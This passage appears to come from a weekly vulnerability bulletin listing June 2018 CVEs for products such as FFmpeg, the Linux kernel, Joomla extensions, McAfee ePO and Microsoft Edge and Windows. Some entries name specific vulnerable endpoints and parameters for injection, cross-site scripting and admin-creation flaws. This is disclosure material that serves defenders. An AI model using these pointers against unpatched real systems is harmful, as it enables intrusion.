The Java implementation of AMF3 deserializers used in Flamingo amf-serializer by Exadel, version 2.2.0 derives class instances from java.io.Externalizable rather than the AMF3 specification's recommendation of flash.utils.IExternalizable. A remote attacker with the ability to spoof or control an RMI server connection may be able to send serialized Java objects that execute arbitrary code when deserialized.2018-06-11not yet calculatedCVE-2017-3201
BID
MISC
MISC
CERT-VN
exadel -- flamingo_amf-serializer
 
The Java implementation of AMF3 deserializers used in Flamingo amf-serializer by Exadel, version 2.2.0, may allow instantiation of arbitrary classes via their public parameter-less constructor and subsequently call arbitrary Java Beans setter methods. The ability to exploit this vulnerability depends on the availability of classes in the class path that make use of deserialization. A remote attacker with the ability to spoof or control information may be able to send serialized Java objects with pre-set properties that result in arbitrary code execution when deserialized.2018-06-11not yet calculatedCVE-2017-3202
BID
MISC
MISC
CERT-VN
exiv2 -- exiv2
 
Exiv2 0.26 has an integer overflow in the LoaderExifJpeg class in preview.cpp, leading to an out-of-bounds read in Exiv2::MemIo::read in basicio.cpp.2018-06-13not yet calculatedCVE-2018-12265
CONFIRM
CONFIRM
exiv2 -- exiv2
 
Exiv2 0.26 has integer overflows in LoaderTiff::getData() in preview.cpp, leading to an out-of-bounds read in Exiv2::ValueType::setDataArea in value.hpp.2018-06-13not yet calculatedCVE-2018-12264
CONFIRM
CONFIRM
expresscart -- expresscart
 
expressCart before 1.1.6 allows remote attackers to create an admin user via a /admin/setup Referer header.2018-06-15not yet calculatedCVE-2018-12457
MISC
MISC
MISC
ffmpeg -- ffmpeg
 
libavcodec in FFmpeg 4.0 may trigger a NULL pointer dereference if the studio profile is incorrectly detected while converting a crafted AVI file to MPEG4, leading to a denial of service, related to idctdsp.c and mpegvideo.c.2018-06-15not yet calculatedCVE-2018-12460
CONFIRM
ffmpeg -- ffmpeg
 
An inconsistent bits-per-sample value in the ff_mpeg4_decode_picture_header function in libavcodec/mpeg4videodec.c in FFmpeg 4.0 may trigger an assertion violation while converting a crafted AVI file to MPEG4, leading to a denial of service.2018-06-15not yet calculatedCVE-2018-12459
CONFIRM
ffmpeg -- ffmpeg
 
An improper integer type in the mpeg4_encode_gop_header function in libavcodec/mpeg4videoenc.c in FFmpeg 4.0 may trigger an assertion violation while converting a crafted AVI file to MPEG4, leading to a denial of service.2018-06-15not yet calculatedCVE-2018-12458
CONFIRM
free_lossless_image_format -- free_lossless_image_format
 
An issue was discovered in Free Lossless Image Format (FLIF) 0.3. The TransformPaletteC<FileIO>::process function in transform/palette_C.hpp allows remote attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted PAM image file.2018-06-11not yet calculatedCVE-2018-12109
MISC
gnome -- evolution
 
addressbook/backends/ldap/e-book-backend-ldap.c in Evolution-Data-Server in GNOME Evolution through 3.29.2 might allow attackers to trigger a Buffer Overflow via a long query that is processed by the strcat function.2018-06-15not yet calculatedCVE-2018-12422
MISC
MISC
gnu -- freedink_dfarc

Directory traversal issues in the D-Mod extractor in DFArc and DFArc2 (as well as in RTsoft's Dink Smallwood HD / ProtonSDK version) before 3.14 allow an attacker to overwrite arbitrary files on the user's system. 2018-06-12 not yet calculated CVE-2018-0496
CONFIRM
CONFIRM
gnupg -- gnupg
 
mainproc.c in GnuPG before 2.2.8 mishandles the original filename during decryption and verification actions, which allows remote attackers to spoof the output that GnuPG sends on file descriptor 2 to other programs that use the "--status-fd 2" option. For example, the OpenPGP data might represent an original filename that contains line feed characters in conjunction with GOODSIG or VALIDSIG status codes.2018-06-08not yet calculatedCVE-2018-12020
MISC
BID
SECTRACK
MISC
MISC
UBUNTU
UBUNTU
DEBIAN
DEBIAN
DEBIAN
grafana -- grafana
 
Grafana before 5.2.0-beta1 has XSS vulnerabilities in dashboard links.2018-06-11not yet calculatedCVE-2018-12099
CONFIRM
CONFIRM
graniteds -- graniteds
 
The Java implementation of AMF3 deserializers used in GraniteDS, version 3.1.1.GA, derives class instances from java.io.Externalizable rather than the AMF3 specification's recommendation of flash.utils.IExternalizable. A remote attacker with the ability to spoof or control an RMI server connection may be able to send serialized Java objects that execute arbitrary code when deserialized. 2018-06-11 not yet calculated CVE-2017-3199
BID
MISC
MISC
CERT-VN
graniteds -- graniteds
 
The Java implementation of AMF3 deserializers used in GraniteDS, version 3.1.1.G, may allow instantiation of arbitrary classes via their public parameter-less constructor and subsequently call arbitrary Java Beans setter methods. The ability to exploit this vulnerability depends on the availability of classes in the class path that make use of deserialization. A remote attacker with the ability to spoof or control information may be able to send serialized Java objects with pre-set properties that result in arbitrary code execution when deserialized.2018-06-11not yet calculatedCVE-2017-3200
BID
MISC
MISC
CERT-VN
hongcms -- hongcms
 
system\errors\404.php in HongCMS 3.0.0 has XSS via crafted input that triggers a 404 HTTP status code.2018-06-13not yet calculatedCVE-2018-12266
MISC
huawei -- hg255s-10
 
Huawei HG255s-10 V100R001C163B025SP02 has a path traversal vulnerability due to insufficient validation of the received HTTP requests; a remote attacker may access the local files on the device without authentication. 2018-06-14 not yet calculated CVE-2017-17309
CONFIRM
huawei -- lyo-l21_smart_phones
 
Huawei smart phones LYO-L21 with software LYO-L21C479B107, LYO-L21C479B107 have a privilege escalation vulnerability. An authenticated, local attacker can craft malformed packets after tricking a user into installing a malicious application and exploit this vulnerability during the exception handling process. Successful exploitation may cause the attacker to obtain a higher privilege on the smart phones. 2018-06-14 not yet calculated CVE-2017-17172
CONFIRM
huawei -- mate_9_smart_phones
 
Due to insufficient parameter verification, the GPU driver of Huawei Mate 9 Pro smart phones with versions before LON-AL00B 8.0.0.356(C00) has an arbitrary memory free vulnerability. An attacker can trick a user into installing a malicious application on the smart phone and send a given parameter to the driver to release a special kernel memory resource. Successful exploit may result in phone crash or arbitrary code execution. 2018-06-14 not yet calculated CVE-2017-17173
CONFIRM
ibm -- financial_transaction_manager_for_ach_services_for_multi-platform
 
IBM Financial Transaction Manager for ACH Services for Multi-Platform 3.0.6 could allow an authenticated user to execute a specially crafted command that could obtain sensitive information. IBM X-Force ID: 138378.2018-06-13not yet calculatedCVE-2018-1393
CONFIRM
BID
XF
ibm -- netezza_platform_software
 
IBM Netezza Platform Software (IBM PureData System for Analytics 1.0.0) could allow a local user to modify a world writable file, which could be used to execute commands as root. IBM X-Force ID: 140211.2018-06-15not yet calculatedCVE-2018-1460
CONFIRM
XF
MISC
ibm -- spectrum_scale
 
A vulnerability in GSKit affects IBM Spectrum Scale 4.1.1, 4.2.0, 4.2.1, 4.2.3, and 5.0.0 that could allow a local attacker to obtain control of the Spectrum Scale daemon and to access and modify files in the Spectrum Scale file system, and possibly to obtain administrator privileges on the node. IBM X-Force ID: 139240.2018-06-13not yet calculatedCVE-2018-1431
CONFIRM
XF
ibm -- websphere_mq

IBM WebSphere MQ 8.0 and 9.0, when configured to use a PAM module for authentication, could allow a user to cause a deadlock in the IBM MQ PAM code which could result in a denial of service. IBM X-Force ID: 138949. 2018-06-15 not yet calculated CVE-2018-1419
CONFIRM
XF
icehrm -- icehrm
 
IceHrm before 23.0.1.OS has a risky usage of a hashed password in a request.2018-06-14not yet calculatedCVE-2018-12420
CONFIRM
CONFIRM
icms -- icms
 
spider.admincp.php in iCMS v7.0.8 has SQL Injection via the id parameter in an app=spider&do=batch request to admincp.php.2018-06-15not yet calculatedCVE-2018-12498
MISC
ignite -- realtime_openfire
 
Ignite Realtime Openfire 3.7.1 is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability via a crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.2018-06-13not yet calculatedCVE-2018-11688
MISC
FULLDISC
BUGTRAQ
java_melody -- java_melody
 
JavaMelody through 1.60.0 has XSS via the counter parameter in a clear_counter action to the /monitoring URI.2018-06-14not yet calculatedCVE-2018-12432
MISC
joomla! -- joomla!
 
router.php in the Harmis Ek rishta (aka ek-rishta) 2.10 component for Joomla! allows SQL Injection via the PATH_INFO to a home/requested_user/Sent%20interest/ URI.2018-06-12not yet calculatedCVE-2018-12254
MISC
EXPLOIT-DB
joomla! -- joomla!
 
The Balbooa Gridbox extension version 2.4.0 and previous versions for Joomla! is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability via a crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.2018-06-14not yet calculatedCVE-2018-11690
MISC
BUGTRAQ
jtdowney -- private_address_check
 
The private_address_check Ruby gem before 0.5.0 is vulnerable to a time-of-check time-of-use (TOCTOU) race condition because the address the socket uses is not checked. DNS entries with a TTL of 0 can trigger this case, where the initial resolution is a public address but the subsequent resolution is a private address. 2018-06-13 not yet calculated CVE-2018-3759
MISC
knowage -- knowage
 
Knowage (formerly SpagoBI) 6.1.1 allows XSS via the name field to the "Business Model's Catalogue" catalogue.2018-06-13not yet calculatedCVE-2018-12353
MISC
knowage -- knowage
 
Knowage (formerly SpagoBI) 6.1.1 allows CSRF via every form, as demonstrated by a /knowage/restful-services/2.0/analyticalDrivers/ POST request.2018-06-13not yet calculatedCVE-2018-12354
MISC
knowage -- knowage
 
Knowage (formerly SpagoBI) 6.1.1 allows XSS via the name or description field to the "Olap Schemas' Catalogue" catalogue.2018-06-13not yet calculatedCVE-2018-12355
MISC
lams -- lams
 
There is unauthenticated reflected cross-site scripting (XSS) in LAMS before 3.1 that allows a remote attacker to introduce arbitrary JavaScript via manipulation of an unsanitized GET parameter during a forgotPasswordChange.jsp?key= password change.2018-06-11not yet calculatedCVE-2018-12090
CONFIRM
libavcodec -- libavcodec
 
The restore_tqb_pixels function in hevc_filter.c in libavcodec, as used in libbpg 0.9.8 and other products, has an integer overflow that leads to a heap-based buffer overflow and remote code execution.2018-06-15not yet calculatedCVE-2018-12447
MISC
MISC
libgcrypt -- libgcrypt
 
Libgcrypt before 1.7.10 and 1.8.x before 1.8.3 allows a memory-cache side-channel attack on ECDSA signatures that can be mitigated through the use of blinding during the signing process in the _gcry_ecc_ecdsa_sign function in cipher/ecc-ecdsa.c, aka the Return Of the Hidden Number Problem or ROHNP. To discover an ECDSA key, the attacker needs access to either the local machine or a different virtual machine on the same physical host.2018-06-13not yet calculatedCVE-2018-0495
MISC
MISC
MISC
MISC
libmagic.a -- libmagic.a
 
The do_core_note function in readelf.c in libmagic.a in file 5.33 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted ELF file.2018-06-11not yet calculatedCVE-2018-10360
CONFIRM
UBUNTU
libressl -- libressl
 
LibreSSL before 2.6.5 and 2.7.x before 2.7.4 allows a memory-cache side-channel attack on DSA and ECDSA signatures, aka the Return Of the Hidden Number Problem or ROHNP. To discover a key, the attacker needs access to either the local machine or a different virtual machine on the same physical host.2018-06-14not yet calculatedCVE-2018-12434
MISC
MISC
MISC
libtomcrypt -- libtomcrypt
 
LibTomCrypt through 1.18.1 allows a memory-cache side-channel attack on ECDSA signatures, aka the Return Of the Hidden Number Problem or ROHNP. To discover an ECDSA key, the attacker needs access to either the local machine or a different virtual machine on the same physical host.2018-06-14not yet calculatedCVE-2018-12437
MISC
linux -- linux_kernel
 
In the Linux Kernel before version 4.15.8, 4.14.25, 4.9.87, 4.4.121, 4.1.51, and 3.2.102, an error in the "_sctp_make_chunk()" function (net/sctp/sm_make_chunk.c) when handling SCTP packet lengths can be exploited to cause a kernel crash. 2018-06-12 not yet calculated CVE-2018-5803
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
MLIST
SECUNIA
MISC
UBUNTU
UBUNTU
UBUNTU
DEBIAN
DEBIAN
MLIST
MLIST
linux -- linux_kernel
 
In the ea_get function in fs/jfs/xattr.c in the Linux kernel through 4.17.1, a memory corruption bug in JFS can be triggered by calling setxattr twice with two different extended attribute names on the same file. This vulnerability can be triggered by an unprivileged user with the ability to create files and execute programs. A kmalloc call is incorrect, leading to slab-out-of-bounds in jfs_xattr.2018-06-12not yet calculatedCVE-2018-12233
BID
MISC
MISC
linux -- linux_kernel
 
In net/socket.c in the Linux kernel through 4.17.1, there is a race condition between fchownat and close in cases where they target the same socket file descriptor, related to the sock_close and sockfs_setattr functions. fchownat does not increment the file descriptor reference count, which allows close to set the socket to NULL during fchownat's execution, leading to a NULL pointer dereference and system crash.2018-06-12not yet calculatedCVE-2018-12232
MISC
BID
MISC
MISC
MISC
linux -- linux_kernel
 
In the Linux Kernel before version 4.16.11, 4.14.43, 4.9.102, and 4.4.133, multiple race condition errors when handling probe, disconnect, and rebind operations can be exploited to trigger a use-after-free condition or a NULL pointer dereference by sending multiple USB over IP packets.2018-06-12not yet calculatedCVE-2018-5814
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
SECUNIA
MISC
little_snitch -- little_snitch
 
Little Snitch versions 4.0 to 4.0.6 use the SecStaticCodeCheckValidityWithErrors() function without the kSecCSCheckAllArchitectures flag and therefore do not validate all architectures stored in a fat binary. An attacker can maliciously craft a fat binary containing multiple architectures that may cause a situation where Little Snitch treats the running process as having no code signature at all while erroneously indicating that the binary on disk does have a valid code signature. This could lead to users being confused about whether or not the code signature is valid.2018-06-12not yet calculatedCVE-2018-10470
CONFIRM
MISC
ltb -- ltb_self_service_password
 
LTB (aka LDAP Tool Box) Self Service Password before 1.3 allows a change to a user password (without knowing the old password) via a crafted POST request, because the ldap_bind return value is mishandled and the PHP data type is not constrained to be a string.2018-06-14not yet calculatedCVE-2018-12421
MISC
MISC
MISC
maccms -- maccms
 
Maccms 10 allows CSRF via admin.php/admin/admin/info.html to add user accounts.2018-06-14not yet calculatedCVE-2018-12114
MISC
MISC
EXPLOIT-DB
matrix-org -- synapse
 
The on_get_missing_events function in handlers/federation.py in Matrix Synapse before 0.31.1 has a security bug in the get_missing_events federation API where event visibility rules were not applied correctly.2018-06-13not yet calculatedCVE-2018-12291
CONFIRM
CONFIRM
matrix-org -- synapse
 
In Synapse before 0.31.2, unauthorised users can hijack rooms when there is no m.room.power_levels event in force.2018-06-14not yet calculatedCVE-2018-12423
MISC
MISC
MISC
matrixssl -- matrixssl
 
MatrixSSL through 3.9.5 Open allows a memory-cache side-channel attack on ECDSA signatures, aka the Return Of the Hidden Number Problem or ROHNP. To discover an ECDSA key, the attacker needs access to either the local machine or a different virtual machine on the same physical host.2018-06-14not yet calculatedCVE-2018-12439
MISC
mcafee -- epolicy_orchestrator
 
Information disclosure vulnerability in McAfee ePolicy Orchestrator (ePO) 5.3.0 through 5.3.3 and 5.9.0 through 5.9.1 allows authenticated users to view sensitive information in plain text format via unspecified vectors.2018-06-15not yet calculatedCVE-2018-6672
CONFIRM
mcafee -- epolicy_orchestrator
 
OS Command Injection vulnerability in McAfee ePolicy Orchestrator (ePO) 5.9.0, 5.3.2, 5.3.1, 5.1.3, 5.1.2, 5.1.1, and 5.1.0 allows attackers to run arbitrary OS commands with limited privileges because user input data is not sanitized before being exported into a CSV format output. 2018-06-13 not yet calculated CVE-2017-3936
BID
CONFIRM
mcafee -- epolicy_orchestrator
 
Application Protection Bypass vulnerability in McAfee ePolicy Orchestrator (ePO) 5.3.0 through 5.3.3 and 5.9.0 through 5.9.1 allows remote authenticated users to bypass localhost only access security protection for some ePO features via a specially crafted HTTP request.2018-06-15not yet calculatedCVE-2018-6671
CONFIRM
mcafee -- network_security_management
 
Password recovery exploitation vulnerability in the non-certificate-based authentication mechanism in McAfee Network Security Management (NSM) before 8.2.7.42.2 allows attackers to crack user passwords via unsalted hashes.2018-06-12not yet calculatedCVE-2017-3962
CONFIRM
mcafee -- network_security_management
 
Exploitation of Authorization vulnerability in the web interface in McAfee Network Security Management (NSM) before 8.2.7.42.2 allows authenticated users to gain elevated privileges via a crafted HTTP request parameter.2018-06-12not yet calculatedCVE-2017-3960
CONFIRM
mcafee -- network_security_management
 
Session fixation vulnerability in the web interface in McAfee Network Security Manager (NSM) before 8.2.7.42.2 and McAfee Network Data Loss Prevention (NDLP) before 9.3.4.1.5 allows remote attackers to disclose sensitive information or manipulate the database via a crafted authentication cookie.2018-06-13not yet calculatedCVE-2017-3968
CONFIRM
CONFIRM
mcafee -- threat_intelligence_exchange
 
Code Injection vulnerability in the ePolicy Orchestrator (ePO) extension in McAfee Threat Intelligence Exchange (TIE) Server 2.1.0 and earlier allows remote attackers to execute arbitrary HTML code to be reflected in the response web page via an unspecified vector. 2018-06-13 not yet calculated CVE-2017-3907
CONFIRM
md4c -- md4c
 
md_build_attribute in md4c.c in md4c 0.2.6 allows remote attackers to cause a denial of service (Segmentation fault and application crash) or possibly have unspecified other impact via a crafted file.2018-06-11not yet calculatedCVE-2018-12112
MISC
md4c -- md4c
 
md4c 0.2.6 has a NULL pointer dereference in the function md_process_line in md4c.c, related to ctx->current_block.2018-06-11not yet calculatedCVE-2018-12102
MISC
MISC
microsoft -- chakracore
 
A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability." This affects ChakraCore. This CVE ID is unique from CVE-2018-8267.2018-06-14not yet calculatedCVE-2018-8243
BID
CONFIRM
microsoft -- edge

An information disclosure vulnerability exists when Microsoft Edge improperly handles objects in memory, aka "Microsoft Edge Information Disclosure Vulnerability." This affects Microsoft Edge. This CVE ID is unique from CVE-2018-0871. 2018-06-14 not yet calculated CVE-2018-8234
BID
SECTRACK
CONFIRM
microsoft -- edge_and_chakracore

A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka "Chakra Scripting Engine Memory Corruption Vulnerability." This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8227. 2018-06-14 not yet calculated CVE-2018-8229
BID
SECTRACK
CONFIRM
microsoft -- edge_and_chakracore
 
A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka "Chakra Scripting Engine Memory Corruption Vulnerability." This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8229.2018-06-14not yet calculatedCVE-2018-8227
BID
SECTRACK
CONFIRM
microsoft -- edge
 
An information disclosure vulnerability exists when Edge improperly marks files, aka "Microsoft Edge Information Disclosure Vulnerability." This affects Microsoft Edge. This CVE ID is unique from CVE-2018-8234.2018-06-14not yet calculatedCVE-2018-0871
BID
SECTRACK
CONFIRM
microsoft -- edge
 
A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory, aka "Microsoft Edge Memory Corruption Vulnerability." This affects Microsoft Edge. This CVE ID is unique from CVE-2018-8111, CVE-2018-8236.2018-06-14not yet calculatedCVE-2018-8110
BID
SECTRACK
CONFIRM
microsoft -- edge
 
A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory, aka "Microsoft Edge Memory Corruption Vulnerability." This affects Microsoft Edge. This CVE ID is unique from CVE-2018-8110, CVE-2018-8236.2018-06-14not yet calculatedCVE-2018-8111
BID
SECTRACK
CONFIRM
microsoft -- edge
 
A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory, aka "Microsoft Edge Memory Corruption Vulnerability." This affects Microsoft Edge. This CVE ID is unique from CVE-2018-8110, CVE-2018-8111.2018-06-14not yet calculatedCVE-2018-8236
BID
SECTRACK
CONFIRM
microsoft -- edge
 
A security feature bypass vulnerability exists when Microsoft Edge improperly handles requests of different origins, aka "Microsoft Edge Security Feature Bypass Vulnerability." This affects Microsoft Edge.2018-06-14not yet calculatedCVE-2018-8235
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer

A security feature bypass vulnerability exists in Internet Explorer that allows for bypassing Mark of the Web Tagging (MOTW), aka "Internet Explorer Security Feature Bypass Vulnerability." This affects Internet Explorer 11. 2018-06-14 not yet calculated CVE-2018-8113
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 
A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory, aka "Internet Explorer Memory Corruption Vulnerability." This affects Internet Explorer 9, Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-8249.2018-06-14not yet calculatedCVE-2018-0978
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 
A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka "Scripting Engine Memory Corruption Vulnerability." This affects Internet Explorer 9, Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-8243.2018-06-14not yet calculatedCVE-2018-8267
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 
A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory, aka "Internet Explorer Memory Corruption Vulnerability." This affects Internet Explorer 11. This CVE ID is unique from CVE-2018-0978.2018-06-14not yet calculatedCVE-2018-8249
BID
SECTRACK
CONFIRM
microsoft -- multiple_products

An information disclosure vulnerability exists when Microsoft Excel improperly discloses the contents of its memory, aka "Microsoft Excel Information Disclosure Vulnerability." This affects Microsoft Excel Viewer, Microsoft Office, Microsoft Excel. 2018-06-14 not yet calculated CVE-2018-8246
BID
SECTRACK
CONFIRM
microsoft -- office_and_office_online_server
 
An elevation of privilege vulnerability exists when Office Web Apps Server 2013 and Office Online Server fail to properly handle web requests, aka "Microsoft Office Elevation of Privilege Vulnerability." This affects Microsoft Office, Microsoft Office Online Server. This CVE ID is unique from CVE-2018-8245.2018-06-14not yet calculatedCVE-2018-8247
BID
SECTRACK
CONFIRM
microsoft -- office_and_outlook
 
An elevation of privilege vulnerability exists when Microsoft Outlook does not validate attachment headers properly, aka "Microsoft Outlook Elevation of Privilege Vulnerability." This affects Microsoft Office, Microsoft Outlook.2018-06-14not yet calculatedCVE-2018-8244
BID
SECTRACK
CONFIRM
microsoft -- office
 
A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka "Microsoft Excel Remote Code Execution Vulnerability." This affects Microsoft Office.2018-06-14not yet calculatedCVE-2018-8248
BID
SECTRACK
CONFIRM
microsoft -- publisher
 
An elevation of privilege vulnerability exists when Microsoft Publisher fails to utilize features that lock down the Local Machine zone when instantiating OLE objects, aka "Microsoft Office Elevation of Privilege Vulnerability." This affects Microsoft Publisher. This CVE ID is unique from CVE-2018-8247.2018-06-14not yet calculatedCVE-2018-8245
BID
SECTRACK
CONFIRM
microsoft -- sharepoint
 
An elevation of privilege vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka "Microsoft SharePoint Elevation of Privilege Vulnerability." This affects Microsoft SharePoint. This CVE ID is unique from CVE-2018-8254.2018-06-14not yet calculatedCVE-2018-8252
BID
SECTRACK
CONFIRM
microsoft -- sharepoint
 
An elevation of privilege vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka "Microsoft SharePoint Elevation of Privilege Vulnerability." This affects Microsoft Project Server, Microsoft SharePoint. This CVE ID is unique from CVE-2018-8252.2018-06-14not yet calculatedCVE-2018-8254
BID
SECTRACK
CONFIRM
microsoft -- windows

A remote code execution vulnerability exists when HTTP Protocol Stack (Http.sys) improperly handles objects in memory, aka "HTTP Protocol Stack Remote Code Execution Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. 2018-06-14 not yet calculated CVE-2018-8231
BID
SECTRACK
CONFIRM
microsoft -- windows
 
An elevation of privilege vulnerability exists in the way that the Windows Kernel API enforces permissions, aka "Windows Elevation of Privilege Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers.2018-06-14not yet calculatedCVE-2018-0982
BID
SECTRACK
CONFIRM
EXPLOIT-DB
microsoft -- windows
 
An elevation of privilege vulnerability exists in Windows when Desktop Bridge does not properly manage the virtual registry, aka "Windows Desktop Bridge Elevation of Privilege Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8214.2018-06-14not yet calculatedCVE-2018-8208
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A remote code execution vulnerability exists when Windows improperly handles objects in memory, aka "Windows Remote Code Execution Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8210.2018-06-14not yet calculatedCVE-2018-8213
BID
SECTRACK
CONFIRM
microsoft -- windows
 
An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka "Windows Kernel Elevation of Privilege Vulnerability." This affects Windows Server 2008, Windows 7, Windows Server 2008 R2.2018-06-14not yet calculatedCVE-2018-8224
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session, aka "Device Guard Code Integrity Policy Security Feature Bypass Vulnerability." This affects Windows Server 2016, Windows 10. This CVE ID is unique from CVE-2018-8201, CVE-2018-8211, CVE-2018-8212, CVE-2018-8215, CVE-2018-8217, CVE-2018-8221.2018-06-14not yet calculatedCVE-2018-8216
BID
SECTRACK
CONFIRM
microsoft -- windows
 
An elevation of privilege vulnerability exists when Windows Hyper-V instruction emulation fails to properly enforce privilege levels, aka "Hypervisor Code Integrity Elevation of Privilege Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers.2018-06-14not yet calculatedCVE-2018-8219
BID
SECTRACK
CONFIRM
microsoft -- windows
 
An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory, aka "Windows GDI Information Disclosure Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers.2018-06-14not yet calculatedCVE-2018-8239
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session, aka "Device Guard Code Integrity Policy Security Feature Bypass Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8211, CVE-2018-8212, CVE-2018-8215, CVE-2018-8216, CVE-2018-8217, CVE-2018-8221.2018-06-14not yet calculatedCVE-2018-8201
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session, aka "Device Guard Code Integrity Policy Security Feature Bypass Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8201, CVE-2018-8211, CVE-2018-8215, CVE-2018-8216, CVE-2018-8217, CVE-2018-8221.2018-06-14not yet calculatedCVE-2018-8212
BID
SECTRACK
CONFIRM
microsoft -- windows
 
An information disclosure vulnerability exists when Windows allows a normal user to access the Wireless LAN profile of an administrative user, aka "Windows Wireless Network Profile Information Disclosure Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers.2018-06-14not yet calculatedCVE-2018-8209
BID
SECTRACK
CONFIRM
microsoft -- windows
 
An elevation of privilege vulnerability exists when the Human Interface Device (HID) Parser Library driver improperly handles objects in memory, aka "HIDParser Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. 2018-06-14 not yet calculated CVE-2018-8169
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session, aka "Device Guard Code Integrity Policy Security Feature Bypass Vulnerability." This affects Windows 10 Servers, Windows 10. This CVE ID is unique from CVE-2018-8201, CVE-2018-8212, CVE-2018-8215, CVE-2018-8216, CVE-2018-8217, CVE-2018-8221.
2018-06-14
not yet calculated
CVE-2018-8211
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session, aka "Device Guard Code Integrity Policy Security Feature Bypass Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8201, CVE-2018-8211, CVE-2018-8212, CVE-2018-8216, CVE-2018-8217, CVE-2018-8221.
2018-06-14
not yet calculated
CVE-2018-8215
BID
SECTRACK
CONFIRM
microsoft -- windows
 
An elevation of privilege vulnerability exists when NTFS improperly checks access, aka "NTFS Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.
2018-06-14
not yet calculated
CVE-2018-1036
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A denial of service vulnerability exists in the HTTP 2.0 protocol stack (HTTP.sys) when HTTP.sys improperly parses specially crafted HTTP 2.0 requests, aka "HTTP.sys Denial of Service Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers.
2018-06-14
not yet calculated
CVE-2018-8226
BID
SECTRACK
CONFIRM
microsoft -- windows
 
An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka "Windows Kernel Information Disclosure Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8121.
2018-06-14
not yet calculated
CVE-2018-8207
BID
SECTRACK
CONFIRM
microsoft -- windows
 
A denial of service vulnerability exists in the way that the Windows Code Integrity Module performs hashing, aka "Windows Code Integrity Module Denial of Service Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.
2018-06-14
not yet calculated
CVE-2018-1040
BID
SECTRACK
CONFIRM
microsoft -- windows
 
